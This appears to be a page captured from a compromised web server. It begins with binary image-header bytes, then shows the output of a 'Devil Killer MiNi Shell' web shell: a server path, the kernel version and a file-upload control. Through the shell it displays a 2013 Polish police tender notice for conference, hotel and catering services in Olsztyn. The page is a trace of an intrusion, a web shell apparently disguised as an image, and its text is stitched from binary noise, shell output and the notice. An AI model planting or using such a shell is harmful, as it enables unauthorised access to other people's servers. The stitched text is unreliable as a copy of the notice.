JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130312/99246-N-2013.html

<p class="kh_header"><b>Olsztyn: Wykonanie usługi wynajmu sal konferencyjnych wraz z usługą hotelową i restauracyjną 
na potrzeby 2 przedsięwzięć edukacyjnych - konferencji z zakresu bezpieczeństwa finansowego Unii Europejskiej organizowanych przez KWP w Olsztynie</b><br>
<b>Numer ogłoszenia: 99246 - 2013; data zamieszczenia: 12.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Partyzantów 6/8, 10-521 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5225200, 5225760, faks 089 5225205.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warminsko-mazurska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi wynajmu sal konferencyjnych wraz z usługą hotelową i restauracyjną 
na potrzeby 2 przedsięwzięć edukacyjnych - konferencji z zakresu bezpieczeństwa finansowego Unii Europejskiej organizowanych przez KWP w Olsztynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie usługi wynajmu sal konferencyjnych dla 110 osób wraz z obsługą techniczną, usługą restauracyjną oraz usługą noclegową:
a) dla zadania Nr 1 - w jednym ośrodku hotelowo-wypoczynkowym na terenie powiatu augustowskiego(woj. podlaskie) w dniach 21-25 kwietnia 2013 r.
b) dla zadania Nr 2 - w jednym ośrodku hotelowo-wypoczynkowym na terenie powiatu piskiego (woj. warmińsko - mazurskie) w dniach 02-05 czerwca 2013 r.
na potrzeby 2 przedsięwzięć edukacyjnych - konferencji z bezpieczeństwa finansowego Unii Europejskiej organizowanych przez Komendę Wojewódzką Policji w Olsztynie w 2013 roku. Realizacja szkoleń jest współfinansowana przez Komisję Europejską - Europejski Urząd ds. Zwalczania Nadużyć Finansowych (OLAF) z programu Hercule II 2007 - 2013. 
2.Wymagania ogólne dla Zadań Nr 1 i Nr 2:
1)wynajem sali konferencyjnej wraz z obsługą techniczną i usługą przygotowania przerw kawowych (serwis napojów ciepłych bez ograniczeń), śniadań, obiadów, kolacji (w tym jedna uroczysta), maksymalnie dla 110 uczestników,
2)zakwaterowanie w pokojach jedno i dwuosobowych z TV i pełnym węzłem sanitarnym, 
3)przygotowanie posiłków zgodnie z zachowaniem zasad higieny i obowiązujących przepisów sanitarnych,
4)przygotowanie posiłków zgodnie z zasadami racjonalnego wyżywienia, urozmaiconych, pełnowartościowych, ze świeżych produktów z ważnymi terminami przydatności do spożycia, 
5)przedstawienia zamawiającemu do akceptacji menu nie później niż na 5 dni przed rozpoczęciem szkolenia,
6)usługi konferencyjne i restauracyjne w jednym budynku, 
7)usługi hotelarskie w obrębie jednego ośrodka,
8)zaplecze sanitarne w sąsiedztwie sali konferencyjnej - osobne dla mężczyzn i kobiet,
9)Wykonawca zapewni co najmniej 1 osobę do obsługi technicznej w trakcie trwania konferencji i na co najmniej na 0,5 godziny przed rozpoczęciem wykładów każdego dnia,
10)Wykonawca w trakcie realizacji zamówienia zapewni:
a.oznakowania sali konferencyjnej oraz drogi do sali, wykonane zgodnie 
z wytycznymi zamawiającego,
b.montaż przekazanych przez zamawiającego najpóźniej na 1 dzień poprzedzający szkolenie plakatów lub innych materiałów wskazujących na rodzaj i współfinansowanie szkolenia,
c.obsługę akustyczno - techniczną podczas szkolenia 
3.Szczegółowy zakres i przedmiot zamówienia dla zadania Nr 1 i zadania Nr 2 opisany został w załączniku nr 8 do SIWZ - Szczegółowy opis przedmiotu zamówienia dostępny na stronie internetowej www.warminsko-mazurska.policja.gov.pl.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.11.00.00-7, 55.32.10.00-6, 55.12.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca:
-oświadczy, iż spełnia warunek dot. posiadania wiedzy i doświadczenia do realizacji przedmiotowego zamówienia;
- wykaże się wykonaniem w okresie trzech ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługi szkoleniowo-konferencyjnej obejmujących jednocześnie zakwaterowanie i wyżywienie dla co najmniej 100 osób przez okres 3 dni w ramach jednego zamówienia (jednej umowy) - jeżeli składa ofertę na jedno zadanie. Jeżeli natomiast Wykonawca składa ofertę na dwa zadania (Nr 1 i Nr 2), to Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie trzech ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usług szkoleniowo-konferencyjnych obejmujących jednocześnie zakwaterowanie i wyżywienie, każda dla co najmniej 100 osób przez okres 3 dni w ramach jednego zamówienia (jednej umowy).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca:
-oświadczy, iż spełnia warunek dot. dysponowania odpowiednim potencjałem technicznym  do wykonania przedmiotowego zamówienia;
-wykaże się dysponowaniem salą konferencyjną dla 110 osób i miejscami noclegowymi niezbędnymi do wykonania zamówienia odpowiednio dla zadania Nr 1 i/lub dla zadania Nr 2 zgodnie z lokalizacją, standardem i wymaganiami określonymi szczegółowo w załączniku Nr 8 do SIWZ Opis przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca:
-oświadczy, iż spełnia warunek dot. dysponowania osobami zdolnymi do wykonania przedmiotowego zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. sytuacji ekonomicznej i finansowej pozwalającej mu na realizację przedmiotowego zamówienia;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zaakceptowany i podpisany przez Wykonawcę Szczegółowy opis przedmiotu zamówienia - załącznik nr 8 do SIWZ dostępny na stronie internetowej Zamawiającego.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Listę podmiotów należących do tej samej grupy kapitałowej lub informację o tym, że Wykonawca nie należy do grupy kapitałowej - wg wzoru stanowiącego załącznik nr 10 do SIWZ dostępnego na stronie internetowej Zamawiającego.
2. Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Dopuszczalna jest zmiana nazwy, określenia, oznaczenia przedmiotu świadczenia Wykonawcy przy zachowaniu tożsamości świadczenia i jego jakości;
2. Zmiany spowodowane wzrostem albo zmniejszeniem stawki VAT. Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę. Jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT zapłaconego przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warminsko-mazurska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji w Olsztynie Sekcja Zamówień Publicznych i Funduszy Pomocowych ul. Partyzantów 6-8, 10-521 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2013 godzina 13:00, miejsce: Komenda Wojewódzka Policji w Olsztynie Sekcja Zamówień Publicznych i Funduszy Pomocowych ul. Partyzantów 6-8, 10-521 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja szkoleń jest współfinansowana przez Komisję Europejską - Europejski Urząd ds. Zwalczania Nadużyć Finansowych (OLAF) z programu Hercule II 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie usługi wynajmu sali konferencyjnej dla 110 osób wraz z obsługą techniczną, usługą restauracyjną oraz usługą noclegową w jednym ośrodku hotelowo-wypoczynkowym na terenie powiatu augustowskiego (woj. podlaskie),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Szkolenie, termin: 21 - 25 kwietnia 2013, czas trwania: cztery dni wykładowe + dzień przyjazdu:
-przyjazd uczestników szkolenia: niedziela, zakwaterowanie od godz. 16.00,
-ilość noclegów: 4 dla 110 osób,
-ilość miejsc noclegowych 110w tym:
-10 pokoi jednoosobowych lub inne w liczbie 10 z możliwością zakwaterowania tylko 1 osoby,
-50 pokoi dwuosobowych,
sala wykładowa:
-czas wynajęcia: 4 dni (patrz: pkt II. 1)
-ilość osób: 110,
Wymagania dla sali konferencyjnej:
-sprzęt multimedialny: rzutnik i projektor kompatybilne z laptopem, laptop z oprogramowaniem min. pakietu microsoft 97-2003 lub wyższe, sprzęt nagłaśniający z dwoma mikrofonami mobilnymi, Internet, 
-tablica sucho ścieralna typu flipchart, 3 kolory flamastrów (czarny, czerwony, zielony),
-stół recepcyjny oraz krzesła przed salą umożliwiające prowadzenie rejestracji uczestników i rozmieszczenia materiałów dla uczestników, 
-klimatyzacja i możliwość zaciemnienia i zapewnienia oświetlenia sztucznego,
-stół prezydialny z miejscami siedzącymi dla 7 osób, widoczny dla każdego uczestnika, 
-miejsca siedzące dla uczestników umożliwiające wykonywanie notatek (z blatami lub przy stołach), 
-możliwość organizacji przerwy kawowej,
-woda, kawa, herbata, cukier, mleko/śmietanka do kawy: zagwarantowana przy stole prezydialnym w ramach usługi przerwy kawowej dla wykładowców,
2.Specyfikacje usługi restauracyjnej, wyżywienie dla 110 osób, podanie zgodne 
z ramowym planem konferencji:
-4 śniadania - szwedzki stół, w tym dwa ciepłe posiłki do wyboru, przekąski zimne (wędliny, sery, warzywa itp.), napoje: kawa, herbata, soki,
-4 obiady - forma szwedzki stół, w tym I danie, II danie, surówki, napoje: kawa, herbata, soki 
-4 kolacje w tym:
-w dniach: 21.04.2013 oraz 23.04.2013-24.2013 - szwedzki stół, w tym dwa ciepłe posiłki do wyboru, przekąski zimne (wędliny, sery, warzywa itp.), napoje: kawa, herbata, soki,
-w dniu 22.04.2013 -  kolacja w formie stołu szwedzkiego, w tym muszą być uwzględnione trzy posiłki ciepłe podawane w określonych odstępach czasu oraz przekąski zimne (wędliny, sery, warzywa, sałatki itp.), napoje: kawa, herbata, soki, bufet, woda, możliwość oprawy muzycznej,
-4 przerwy kawowe w dniach  22.04.13, 23.04.13, 24.04.13, 25.04.13 w tym:
-kawa, herbata, cukier, cytryna, mleko/śmietanka do kawy,
-woda mineralna butelkowana niegazowana i gazowana na każdego uczestnika (małe butelki),
-mieszanka ciastek lub ciast, 
-serwis gastronomiczny: bieżące kontrolowanie ilości napojów gorących, przygotowanie, zastawa, sprzątanie,
3.Odległość miejsca szkolenia nie większa niż 10 km od fabryki tytoniu w Augustowie,
4.Maksymalny koszt szkolenia:  poniżej przedstawiono poszczególne kwoty graniczne netto dla elementów składowych zamówienia:
Wynajęcie sali konferencyjnej 4 dni	- 4 950,378576 zł
Przerwy kawowe 4 - 4 580,73616 zł	
Zakwaterowanie dla 110 osób na 4 doby -26 582,41872 zł	
Wyżywienie (4 śniadania, 4 obiady, 4 kolacje) dla 110 osób przez 4 dni	- 56 932,00656 zł
Suma	93 045,54	
Uwaga! Ostateczna liczba rzeczywistych uczestników szkolenia będzie podana przez Zamawiającego najpóźniej na 5 dni przed terminem rozpoczęcia, tym samym liczba noclegów, śniadań, obiadów i kolacji. Zamawiający przekaże wykonawcy ramowy plan szkolenia nie później niż 5 dni przed rozpoczęciem danego szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.11.00.00-7, 55.32.10.00-6, 55.12.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 21.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie usługi wynajmu sali konferencyjnej dla 110 osób wraz z obsługą techniczną, usługą restauracyjną oraz usługą noclegową w jednym ośrodku hotelowo-wypoczynkowym na terenie powiatu piskiego (woj. warmińsko-mazurskie)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie, termin 02-05 czerwca 2013, czas trwania: trzy dni wykładowe + dzień przyjazdu
-przyjazd uczestników szkolenia: niedziela, zakwaterowanie możliwe od godziny 16, 
-ilość noclegów: 3 dla 110 osób,  
-ilość uczestników: 110 osób
Ilość miejsc noclegowych: 110, w tym:
-10 pokoi jednoosobowych lub inne w liczbie 10 z możliwością zakwaterowania w każdym z nich tylko 1 osoby, 
-50 pokoi dwuosobowych, lub inne z możliwością zakwaterowania w każdym z nich tylko dwóch osób,
Wykonawca zobowiązany jest zapewnić w stosunku do sali konferencyjnej: 
-czas wynajęcia: 3 dni (patrz: pkt. II.2)
-ilość osób: 110,
Wymagania dla sali konferencyjnej:
-sprzęt multimedialny: rzutnik i projektor kompatybilne 
z laptopem, laptop z oprogramowaniem min. pakietu microsoft 97-2003 lub wyższe, sprzęt nagłaśniający z dwoma mikrofonami mobilnymi, Internet, 
-tablica sucho ścieralna typu flipchart, 3 kolory flamastrów (czarny, czerwony, zielony),
-stół recepcyjny oraz krzesła przed salą umożliwiające prowadzenie rejestracji uczestników i rozmieszczenia materiałów dla uczestników, 
-klimatyzacja i możliwość zaciemnienia i zapewnienia oświetlenia sztucznego,
-stół prezydialny z miejscami siedzącymi dla 7 osób, widoczny dla każdego uczestnika, 
-miejsca siedzące dla uczestników umożliwiające wykonywanie notatek (z blatami lub przy stołach), 
-możliwość organizacji przerwy kawowej,
-woda mineralna + kawa, herbata dla wykładowców (7 osób), zagwarantowana przy stole prezydialnym w ramach usługi przerwy kawowej, 
b)specyfikacje usługi restauracyjnej wyżywienie dla 110 osób:
-3 śniadania - szwedzki stół, w tym dwa ciepłe posiłki do wyboru, przekąski zimne (wędliny, sery, warzywa itp.), napoje: kawa, herbata, soki,
-3 obiady - szwedzki stół, forma szwedzki stół, w tym I danie, II danie, surówki, napoje: kawa, herbata, soki 
-2 kolacje - szwedzki stół, w tym dwa ciepłe posiłki do wyboru, przekąski zimne (wędliny, sery, warzywa itp.), napoje: kawa, herbata, soki, 
-1 kolacja uroczysta w formie bufetu szwedzkiego, w tym: możliwość zorganizowania kolacji w formie stołu szwedzkiego, w tym muszą być uwzględnione trzy posiłki ciepłe podawane w określonych odstępach czasu oraz przekąski zimne (wędliny, sery, warzywa, sałatki itp.), napoje: kawa, herbata, soki, bufet, woda, możliwość oprawy muzycznej,
-3 przerwy kawowe w dniach szkolenia: 03.06.13,04.06.13,05.06.13:
-kawa, herbata, cukier, cytryna, mleko/śmietanka do kawy,
-woda mineralna butelkowana niegazowana i gazowana na każdego uczestnika (małe butelki),
-mieszanka ciastek lub ciast, 
-serwis gastronomiczny: bieżące kontrolowanie ilości napojów gorących, przygotowanie, zastawa, sprzątanie,
c)maksymalny koszt szkolenia: tabela poniżej przedstawia poszczególne kwoty graniczne netto dla elementów składowych zamówienia:
Wynajęcie sali konferencyjnej 3 dni	- 225,01721 zł	
Przerwy kawowe w liczbie 3 - 4 536,5206 zł
Zakwaterowanie dla 110 osób przez 3 doby -13 370,797 zł	
Wyżywienie łącznie na 110 os. przez 3 dni	 - 23 398,896 zł	
Uroczysta kolacja łącznie na 110 - 9 550,5696 zł	
Suma	51 081,80 zł

